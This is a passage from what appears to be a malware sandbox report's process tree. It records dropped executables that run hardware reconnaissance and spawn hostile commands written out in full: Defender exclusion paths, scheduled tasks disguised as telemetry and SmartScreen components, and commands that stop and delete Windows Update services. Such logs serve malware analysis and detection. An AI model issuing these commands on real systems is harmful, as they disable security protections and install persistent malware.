                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                        wmic os get Caption
                                                                                        27⤵
                                                                                          PID:2672
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd /C "wmic path win32_VideoController get name"
                                                                                          27⤵
                                                                                            PID:2924
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic path win32_VideoController get name
                                                                                              28⤵
                                                                                                PID:532
                                                                                          • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                            26⤵
                                                                                              PID:992
                                                                                            • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                                              26⤵
                                                                                                PID:2192
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 88
                                                                                                  27⤵
                                                                                                  • Program crash
                                                                                                  PID:2636
                                                                                              • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                                                                26⤵
                                                                                                  PID:3012
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 88
                                                                                              24⤵
                                                                                              • Program crash
                                                                                              PID:2528
                                                                                          • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                            23⤵
                                                                                              PID:1996
                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                wmic os get Caption
                                                                                                24⤵
                                                                                                  PID:1056
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  cmd /C "wmic path win32_VideoController get name"
                                                                                                  24⤵
                                                                                                    PID:888
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic path win32_VideoController get name
                                                                                                      25⤵
                                                                                                        PID:1420
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd /C "wmic cpu get name"
                                                                                                      24⤵
                                                                                                        PID:2096
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic cpu get name
                                                                                                          25⤵
                                                                                                            PID:748
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                        23⤵
                                                                                                          PID:1532
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                                                                          23⤵
                                                                                                            PID:1704
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 88
                                                                                                        21⤵
                                                                                                        • Program crash
                                                                                                        PID:2796
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                                      20⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      PID:2512
                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                        wmic os get Caption
                                                                                                        21⤵
                                                                                                          PID:1972
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          cmd /C "wmic path win32_VideoController get name"
                                                                                                          21⤵
                                                                                                            PID:1084
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic path win32_VideoController get name
                                                                                                              22⤵
                                                                                                                PID:2912
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              cmd /C "wmic cpu get name"
                                                                                                              21⤵
                                                                                                                PID:2488
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic cpu get name
                                                                                                                  22⤵
                                                                                                                    PID:2856
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                20⤵
                                                                                                                  PID:2360
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                                                                                  20⤵
                                                                                                                    PID:2656
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 88
                                                                                                                18⤵
                                                                                                                • Program crash
                                                                                                                PID:2920
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                                              17⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2264
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                cmd /C "wmic path win32_VideoController get name"
                                                                                                                18⤵
                                                                                                                  PID:2716
                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                    wmic path win32_VideoController get name
                                                                                                                    19⤵
                                                                                                                      PID:2688
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    cmd /C "wmic cpu get name"
                                                                                                                    18⤵
                                                                                                                      PID:2580
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic cpu get name
                                                                                                                        19⤵
                                                                                                                          PID:2664
                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                        wmic os get Caption
                                                                                                                        18⤵
                                                                                                                          PID:2464
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                        17⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2668
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                          18⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:2816
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                                                                                        17⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2704
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 88
                                                                                                                    15⤵
                                                                                                                    • Program crash
                                                                                                                    PID:1308
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                                                  14⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1356
                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                    wmic os get Caption
                                                                                                                    15⤵
                                                                                                                      PID:2116
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd /C "wmic path win32_VideoController get name"
                                                                                                                      15⤵
                                                                                                                        PID:2136
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          wmic path win32_VideoController get name
                                                                                                                          16⤵
                                                                                                                            PID:2184
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          cmd /C "wmic cpu get name"
                                                                                                                          15⤵
                                                                                                                            PID:2084
                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                              wmic cpu get name
                                                                                                                              16⤵
                                                                                                                                PID:900
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                            14⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1764
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                              15⤵
                                                                                                                              • Creates scheduled task(s)
                                                                                                                              PID:2956
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                                                                                            14⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1980
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 88
                                                                                                                        12⤵
                                                                                                                        • Program crash
                                                                                                                        PID:1212
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                                                      11⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1600
                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                        wmic os get Caption
                                                                                                                        12⤵
                                                                                                                          PID:884
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          cmd /C "wmic cpu get name"
                                                                                                                          12⤵
                                                                                                                            PID:1724
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            cmd /C "wmic path win32_VideoController get name"
                                                                                                                            12⤵
                                                                                                                              PID:2736
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                            11⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1148
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                              12⤵
                                                                                                                              • Creates scheduled task(s)
                                                                                                                              PID:748
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                                                                                            11⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Drops file in Drivers directory
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2016
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 88
                                                                                                                        9⤵
                                                                                                                        • Program crash
                                                                                                                        PID:1592
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                                                      8⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1240
                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                        wmic os get Caption
                                                                                                                        9⤵
                                                                                                                          PID:1420
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          cmd /C "wmic path win32_VideoController get name"
                                                                                                                          9⤵
                                                                                                                            PID:1400
                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                              wmic path win32_VideoController get name
                                                                                                                              10⤵
                                                                                                                                PID:1940
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              cmd /C "wmic cpu get name"
                                                                                                                              9⤵
                                                                                                                                PID:760
                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                  wmic cpu get name
                                                                                                                                  10⤵
                                                                                                                                    PID:888
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:1016
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                  9⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:2276
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                                                                                                8⤵
                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                • Drops file in Drivers directory
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:644
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                  9⤵
                                                                                                                                    PID:2612
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 88
                                                                                                                              6⤵
                                                                                                                              • Program crash
                                                                                                                              PID:1640
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:744
                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                              wmic os get Caption
                                                                                                                              6⤵
                                                                                                                                PID:1280
                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                  sc stop UsoSvc
                                                                                                                                  7⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:2852
                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                  sc stop WaaSMedicSvc
                                                                                                                                  7⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:2616
                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                  sc stop wuauserv
                                                                                                                                  7⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:2128
                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                  sc stop bits
                                                                                                                                  7⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:2512
                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                  sc stop dosvc
                                                                                                                                  7⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:2168
                                                                                                                                • C:\Windows\System32\reg.exe
                                                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                  7⤵
                                                                                                                                    PID:2624
                                                                                                                                  • C:\Windows\System32\reg.exe
                                                                                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                    7⤵
                                                                                                                                      PID:524
                                                                                                                                    • C:\Windows\System32\reg.exe
                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                      7⤵
                                                                                                                                        PID:2360
                                                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                        7⤵
                                                                                                                                        • Modifies security service
                                                                                                                                        PID:2948
                                                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                        7⤵
                                                                                                                                          PID:2960
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        cmd /C "wmic path win32_VideoController get name"
                                                                                                                                        6⤵
                                                                                                                                          PID:960
                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                            wmic path win32_VideoController get name
                                                                                                                                            7⤵
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:340
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          cmd /C "wmic cpu get name"
                                                                                                                                          6⤵
                                                                                                                                            PID:1588
                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                              wmic cpu get name
                                                                                                                                              7⤵
                                                                                                                                                PID:1476
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:1228
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:2092
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:2044
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 88
                                                                                                                                        3⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:1712
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:2124
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                      2⤵
                                                                                                                                        PID:2300
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        PID:2628
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                                                                                                          3⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:1008
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        PID:3024
                                                                                                                                      • C:\Windows\System32\dialer.exe
                                                                                                                                        C:\Windows\System32\dialer.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:1260
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                          2⤵
                                                                                                                                            PID:2276
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                                                                                                            2⤵
                                                                                                                                              PID:2176
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                                                                                                                3⤵
                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                PID:2308
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                              2⤵
                                                                                                                                                PID:2928
                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                  sc stop UsoSvc
                                                                                                                                                  3⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:2972
                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                  sc stop WaaSMedicSvc
                                                                                                                                                  3⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:3008
                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                  sc stop wuauserv
                                                                                                                                                  3⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:576
                                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                                  sc stop bits
                                                                                                                                                  3⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:2112
                                                                                                                                                • C:\Windows\System32\reg.exe
                                                                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2696
                                                                                                                                                  • C:\Windows\System32\reg.exe
                                                                                                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1700
                                                                                                                                                    • C:\Windows\System32\reg.exe
                                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2912
                                                                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3064
                                                                                                                                                        • C:\Windows\System32\reg.exe
                                                                                                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2676
                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                            sc stop dosvc
                                                                                                                                                            3⤵
                                                                                                                                                            • Launches sc.exe
                                                                                                                                                            PID:3036
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                                                                                                                          2⤵
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          PID:2340
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2232
                                                                                                                                                          • C:\Windows\System32\dialer.exe
                                                                                                                                                            C:\Windows\System32\dialer.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3032
                                                                                                                                                            • C:\Windows\System32\dialer.exe
                                                                                                                                                              C:\Windows\System32\dialer.exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2620
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2512
                                                                                                                                                                • C:\Windows\System32\cmd.exe
